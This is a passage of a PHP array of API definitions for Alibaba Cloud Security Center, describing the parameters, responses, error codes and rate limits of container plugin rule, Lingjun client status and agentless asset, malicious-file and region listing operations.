'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '183030', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Specifies the language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The query conditions. The format is as follows:'."\n" .'```json'."\n" .'['."\n" .' {'."\n" .' "name": "ruleName",'."\n" .' "value": "test"'."\n" .' }'."\n" .']'."\n" .'```'."\n" .'**- name**: The condition name. The following conditions are supported:'."\n" .'- **ruleName**: The rule name.'."\n" ."\n" .'**- value**: The condition value.', 'type' => 'string', 'required' => false, 'example' => '[{\\"name\\": \\"name\\", \\"value\\": \\"test-1818\\"}]', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The rule type. Valid values:'."\n" .'- **0**: User-defined.'."\n" .'- **1**: System built-in.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'default' => '0', 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RuleList' => [ 'description' => 'The list of rules.', 'type' => 'array', 'items' => [ 'description' => 'The rule.', 'type' => 'object', 'properties' => [ 'GmtCreate' => ['description' => 'The time when the rule was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1676355025000', 'title' => ''], 'GmtModified' => ['description' => 'The time when the current entity type was modified. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1681985833000', 'title' => ''], 'RuleId' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '30****', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test-18****', 'title' => ''], 'RuleDescription' => ['description' => 'The rule description.', 'type' => 'string', 'example' => 'system_call', 'title' => ''], 'RuleTemplateId' => ['description' => 'The rule template ID. You can call ListSystemClientRules to obtain the template ID.', 'type' => 'string', 'example' => '868**', 'title' => ''], 'RuleTemplateName' => ['description' => 'The rule template name.', 'type' => 'string', 'example' => 'system_call', 'title' => ''], 'Mode' => ['description' => 'The rule action mode. Valid values:'."\n" .'- **1**: Alert.'."\n" .'- **2**: Block.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SelectedPolicy' => [ 'description' => 'The list of selected rule policies.', 'type' => 'array', 'items' => ['description' => 'The information about the permission policy for which the rule is enabled.', 'type' => 'string', 'example' => 'system_schedule_task', 'title' => ''], 'title' => '', 'example' => '', ], 'SwitchId' => ['description' => 'The switch ID associated with the rule.', 'type' => 'string', 'example' => 'USER-ENABLE-SWITCH-TYPE_****', 'title' => ''], 'WhiteImages' => [ 'description' => 'The list of whitelisted images.', 'type' => 'array', 'items' => ['description' => 'The whitelisted image.', 'type' => 'string', 'example' => 'nginx:latest', 'title' => ''], 'title' => '', 'example' => '', ], 'Policies' => [ 'description' => 'The list of policies.', 'type' => 'array', 'items' => [ 'description' => 'The policy.', 'type' => 'object', 'properties' => [ 'PolicyKey' => ['description' => 'The policy key.', 'type' => 'string', 'example' => 'system_auto_****', 'title' => ''], 'PolicyName' => ['description' => 'The policy name.', 'type' => 'string', 'example' => '系统自启动任务****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'ListAegisContainerPluginRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAegisContainerPluginRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAegisContainerPluginRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69\\n },\\n \\"RuleList\\": [\\n {\\n \\"GmtCreate\\": 1676355025000,\\n \\"GmtModified\\": 1681985833000,\\n \\"RuleId\\": 0,\\n \\"RuleName\\": \\"test-18****\\",\\n \\"RuleDescription\\": \\"system_call\\",\\n \\"RuleTemplateId\\": \\"868**\\",\\n \\"RuleTemplateName\\": \\"system_call\\",\\n \\"Mode\\": 1,\\n \\"SelectedPolicy\\": [\\n \\"system_schedule_task\\"\\n ],\\n \\"SwitchId\\": \\"USER-ENABLE-SWITCH-TYPE_****\\",\\n \\"WhiteImages\\": [\\n \\"nginx:latest\\"\\n ],\\n \\"Policies\\": [\\n {\\n \\"PolicyKey\\": \\"system_auto_****\\",\\n \\"PolicyName\\": \\"系统自启动任务****\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'ListAegisForLingjunStatus' => [ 'summary' => 'Query the Aegis client installation result for Lingjun bare metal.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '257541', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'autoTest' => false, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'List of unique UUIDs for Lingjun bare metal.', 'type' => 'array', 'items' => ['description' => 'Unique UUID for Lingjun bare metal.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) API to get the server\'s UUID.', 'type' => 'string', 'required' => false, 'example' => 'inet-a6444920-d303-4ccf-ab87-a1d3cd49****', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Returned result.', 'type' => 'object', 'properties' => [ 'InvokeTasks' => [ 'description' => 'List of returned installation tasks.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'Unique UUID for Lingjun bare metal.', 'type' => 'string', 'example' => 'inet-8e3fbd56-122c-4011-b692-4d048076****'."\n", 'title' => ''], 'InvokeId' => ['title' => '', 'description' => 'Installation task ID for the Lingjun machine.', 'type' => 'string', 'example' => 't-bj05dlbzple****'], 'Status' => ['description' => 'Installation status. Values:'."\n" .'- **1**: Installation successful'."\n" .'- **0**: Installation failed', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Result' => ['description' => 'Installation processing result. Values:'."\n" .'- success: Installation successful'."\n" .'- fail: Installation failed', 'type' => 'string', 'example' => 'success', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the API call was successful. Values:'."\n" .'- **true**: Success'."\n" .'- **false**: Failure', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"InvokeTasks\\": [\\n {\\n \\"Uuid\\": \\"inet-8e3fbd56-122c-4011-b692-4d048076****\\\\n\\",\\n \\"InvokeId\\": \\"t-bj05dlbzple****\\",\\n \\"Status\\": 1,\\n \\"Result\\": \\"success\\"\\n }\\n ],\\n \\"Success\\": true,\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', 'title' => 'Query the Aegis Client Installation Result for Lingjun Bare Metal', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAegisForLingjunStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ListAegisForLingjunStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListAgentlessAsset' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '223284', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of items to return per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The type of the detection target. Values:'."\n" ."\n" .'- **3**: User snapshot'."\n" ."\n" .'- **4**: User-defined image', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 's-bp1g6wxdwps7s9dz****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 'ca_cpm_******', 'title' => ''], ], [ 'name' => 'DiskType', 'in' => 'query', 'schema' => ['description' => 'The type of the cloud disk. Values:'."\n" ."\n" .'- **system**: System disk'."\n" ."\n" .'- **data**: Data disk', 'type' => 'string', 'required' => false, 'example' => 'data', 'title' => ''], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The type of the operating system.', 'type' => 'string', 'required' => false, 'example' => 'CentOS', 'title' => ''], ], [ 'name' => 'ScanRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID.', 'type' => 'string', 'required' => false, 'example' => 'cn-beijing', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'type' => 'array', 'items' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'maxItems' => 100, 'description' => '', 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'PageInfo' => [ 'description' => 'Pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of items to display per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of items.', 'type' => 'integer', 'format' => 'int32', 'example' => '90', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AssetList' => [ 'description' => 'The list of returned assets.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The instance ID.', 'type' => 'string', 'example' => 's-rj9gda4wolo0zixi****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'TestInstanceName', 'title' => ''], 'TargetType' => ['description' => 'The type of the asset. Values:'."\n" ."\n" .'- **3**: User snapshot'."\n" ."\n" .'- **4**: User-defined image', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'RegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'DiskType' => ['description' => 'The type of the cloud disk. Values:'."\n" ."\n" .'- system: System disk.'."\n" ."\n" .'- data: Data disk.', 'type' => 'string', 'example' => 'system', 'title' => ''], 'Platform' => ['description' => 'Operating system type.', 'type' => 'string', 'example' => 'CentOS', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListAgentlessAsset', 'summary' => 'Query agentless detection assets.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessAsset'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAgentlessAsset', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 90\\n },\\n \\"AssetList\\": [\\n {\\n \\"InstanceId\\": \\"s-rj9gda4wolo0zixi****\\",\\n \\"InstanceName\\": \\"TestInstanceName\\",\\n \\"TargetType\\": 3,\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"DiskType\\": \\"system\\",\\n \\"Platform\\": \\"CentOS\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAgentlessMaliciousFiles' => [ 'summary' => 'Retrieves the list of malicious files detected by agentless detection.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '164201', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Levels', 'in' => 'query', 'schema' => ['description' => 'The severity levels. Separate multiple values with commas (,). Valid values:'."\n" ."\n" .'- serious: urgent'."\n" .'- suspicious: suspicious'."\n" .'- remind: reminder.', 'type' => 'string', 'required' => false, 'example' => 'remind,suspicious', 'title' => ''], ], [ 'name' => 'FuzzyMaliciousName', 'in' => 'query', 'schema' => ['description' => 'The name of the malicious file to query.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'WebShell', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return per page in a paging query.', 'type' => 'string', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'MaliciousMd5', 'in' => 'query', 'schema' => ['description' => 'The MD5 hash of the malicious file.', 'type' => 'string', 'required' => false, 'example' => 'd836968041f7683b5459****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the asset.', 'type' => 'string', 'required' => false, 'example' => 'd2d94e8b-bb25-4744-8004-1e08a53c****', 'title' => ''], ], [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '81****', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The asset information to query. You can set this parameter to the asset name, public IP address, or private IP address. Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the alert has been handled. Valid values:'."\n" ."\n" .'- Y: handled'."\n" .'- N: not handled.', 'type' => 'string', 'required' => false, 'example' => 'Y', 'title' => ''], ], [ 'name' => 'MaliciousType', 'in' => 'query', 'schema' => ['description' => 'The Alarm Metric.'."\n" ."\n" .'If Lang is set to zh, valid values:'."\n" ."\n" .'- WebShell: WebShell'."\n" .'- 恶意软件: malware'."\n" .'- 恶意脚本: malicious script'."\n" ."\n" .'If Lang is set to en, valid values:'."\n" ."\n" .'- WebShell: WebShell'."\n" .'- Malicious Software: malware'."\n" .'- Malicious Script: malicious script.', 'type' => 'string', 'required' => false, 'example' => 'WebShell', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The file source.', 'type' => 'array', 'items' => ['description' => 'The file source. Valid values:'."\n" ."\n" .'- **agentless**: host detection.'."\n" .'- **ecs_snapshot**: user snapshot detection.'."\n" .'- **ecs_image**: user custom image detection.', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE343162-35BF-565E-B85E-8E3B7A2B****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number in the returned results.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of malicious files found.', 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'Count' => ['description' => 'The number of malicious file entries displayed on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'List' => [ 'description' => 'The list of malicious files.', 'type' => 'array', 'items' => [ 'description' => 'The list of malicious files.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1****', 'title' => ''], 'FirstScanTimestamp' => ['description' => 'The timestamp of the first scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '168257753****', 'title' => ''], 'LatestScanTimestamp' => ['description' => 'The timestamp of the latest scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '168257753****', 'title' => ''], 'Level' => ['description' => 'The severity level. Valid values:'."\n" ."\n" .'- serious: urgent'."\n" .'- suspicious: suspicious'."\n" .'- remind: reminder.', 'type' => 'string', 'example' => 'serious', 'title' => ''], 'MaliciousMd5' => ['description' => 'The MD5 hash of the malicious file.', 'type' => 'string', 'example' => '1f2e13a7c51ee89316ae50066515****', 'title' => ''], 'FilePath' => ['description' => 'The file path.', 'type' => 'integer', 'format' => 'int64', 'example' => '/root/etc/g****', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'example' => 'sql-test-001****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'TargetId' => ['description' => 'The ID of the scan target.', 'type' => 'string', 'example' => 'm-****', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.', 'type' => 'string', 'example' => 'jenkins****', 'title' => ''], 'TargetType' => ['description' => 'The object type of the scan target. Valid values:'."\n" ."\n" .'- 2: image.', 'type' => 'string', 'example' => '2', 'title' => ''], 'DownloadUrl' => ['description' => 'The download URL of the malicious sample.', 'type' => 'string', 'example' => 'https://upgrade-rule-pkg.oss-cn-beijing.aliyuncs.com/totalpackage/rule/V3.166.2/totalpackage_rule_V3.16_6.2_tip_20230220110****', 'title' => ''], 'HighLight' => ['description' => 'The highlighted text, in JSON string format.', 'type' => 'string', 'example' => '{\\"highlight\\":{\\"ruleVersion\\":\\"20230223\\",\\"ruleId\\":600139,\\"events\\":[[207,284]]}}', 'title' => ''], 'Notes' => [ 'description' => 'The remarks.', 'type' => 'array', 'items' => [ 'description' => 'The remarks.', 'type' => 'object', 'properties' => [ 'Note' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'Serious***', 'title' => ''], 'NoteId' => ['description' => 'The ID of the remark record.', 'type' => 'string', 'example' => '50****', 'title' => ''], 'NoteTime' => ['description' => 'The time of the remark record.', 'type' => 'string', 'example' => '2023-04-27 14:49:21', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Details' => [ 'description' => 'The alert event details.', 'type' => 'array', 'items' => [ 'description' => 'The alert event details.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the alert event detail item.', 'type' => 'string', 'example' => 'MD5', 'title' => ''], 'Type' => ['description' => 'The type of the alert event detail item.', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The value of the alert event detail item.', 'type' => 'string', 'example' => '1', 'title' => ''], 'NameKey' => ['description' => 'The name key of the alert event detail item.', 'type' => 'string', 'example' => '${suspicious.mp.db.maliciousfilemd5}', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'MaliciousName' => ['description' => 'The name of the malicious file.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], 'Partition' => ['description' => 'The disk partition.', 'type' => 'string', 'example' => '/dev/xvda1', 'title' => ''], 'OperateResult' => ['description' => 'The alert handling result.', 'type' => 'string', 'example' => 'addWhitelist.USER.Success', 'title' => ''], 'OperateTimestamp' => ['description' => 'The timestamp when the alert was handled, in milliseconds.', 'type' => 'string', 'example' => '168257753****', 'title' => ''], 'MaliciousType' => ['description' => 'The virus type.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve agentless detection malicious file list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessMaliciousFiles'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListAgentlessMaliciousFiles', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE343162-35BF-565E-B85E-8E3B7A2B****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 23,\\n \\"Count\\": 20\\n },\\n \\"List\\": [\\n {\\n \\"Id\\": 0,\\n \\"FirstScanTimestamp\\": 0,\\n \\"LatestScanTimestamp\\": 0,\\n \\"Level\\": \\"serious\\",\\n \\"MaliciousMd5\\": \\"1f2e13a7c51ee89316ae50066515****\\",\\n \\"FilePath\\": 0,\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"InstanceName\\": \\"sql-test-001****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"TargetId\\": \\"m-****\\",\\n \\"TargetName\\": \\"jenkins****\\",\\n \\"TargetType\\": \\"2\\",\\n \\"DownloadUrl\\": \\"https://upgrade-rule-pkg.oss-cn-beijing.aliyuncs.com/totalpackage/rule/V3.166.2/totalpackage_rule_V3.16_6.2_tip_20230220110****\\",\\n \\"HighLight\\": \\"{\\\\\\\\\\\\\\"highlight\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"ruleVersion\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"20230223\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ruleId\\\\\\\\\\\\\\":600139,\\\\\\\\\\\\\\"events\\\\\\\\\\\\\\":[[207,284]]}}\\",\\n \\"Notes\\": [\\n {\\n \\"Note\\": \\"Serious***\\",\\n \\"NoteId\\": \\"50****\\",\\n \\"NoteTime\\": \\"2023-04-27 14:49:21\\"\\n }\\n ],\\n \\"Details\\": [\\n {\\n \\"Name\\": \\"MD5\\",\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"1\\",\\n \\"NameKey\\": \\"${suspicious.mp.db.maliciousfilemd5}\\"\\n }\\n ],\\n \\"MaliciousName\\": \\"WebShell\\",\\n \\"Partition\\": \\"/dev/xvda1\\",\\n \\"OperateResult\\": \\"addWhitelist.USER.Success\\",\\n \\"OperateTimestamp\\": \\"168257753****\\",\\n \\"MaliciousType\\": \\"WebShell\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAgentlessRegion' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '159361', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92****', 'title' => ''], 'RegionList' => [ 'description' => 'The region list information.', 'type' => 'array', 'items' => ['description' => 'The region list information.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'title' => '', 'example' => '', ], 'VendorRegionList' => [ 'description' => 'The region list information.', 'type' => 'array', 'items' => [ 'description' => 'The region list information.', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud.'."\n" .'- **3**: Tencent Cloud.'."\n" .'- **4**: Huawei Cloud.'."\n" .'- **5**: Azure.'."\n" .'- **7**: AWS.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The region in which the server resides.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], 